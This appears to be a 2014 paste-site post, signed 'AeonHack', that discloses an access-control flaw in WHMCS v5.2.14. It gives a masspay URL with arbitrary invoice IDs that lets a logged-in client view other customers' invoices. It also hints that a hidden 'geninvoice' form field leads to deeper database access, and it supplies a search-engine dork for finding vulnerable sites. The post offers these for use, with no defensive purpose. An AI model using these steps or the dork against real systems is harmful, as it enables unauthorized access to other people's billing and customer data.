WHMCS v5.2.14 Vulnerability

SUBMITTED BY: Guest

DATE: Feb. 1, 2014, 12:28 a.m.

FORMAT: PHP

SIZE: 683 Bytes

Raw Download

HITS: 846

Report
  1. I decided to give WHMCS a chance to patch this. The first part of this vulnerability:
  3. Login as a client.
  4. Start your quest at /clientarea.php?action=masspay&invoiceids[]=1&invoiceids[]=2
  5. This will allow you to access any invoice, even if you don't own it.
  7. If you've got what it takes, you'll find out how to exploit this further and get some real database access.
  9. Ternyata hint ada d sini sebenarnya ->
  11. PHP Code:
  12. <input type="hidden" name="geninvoice" value="true" />
  14. Have fun!
  17. Dork : powered by whmcompletesolution inurl:clientarea.php?action=masspay
  18. Selamat ya.
  20. View Source
  22. Regards ,
  24. AeonHack
comments powered by Disqus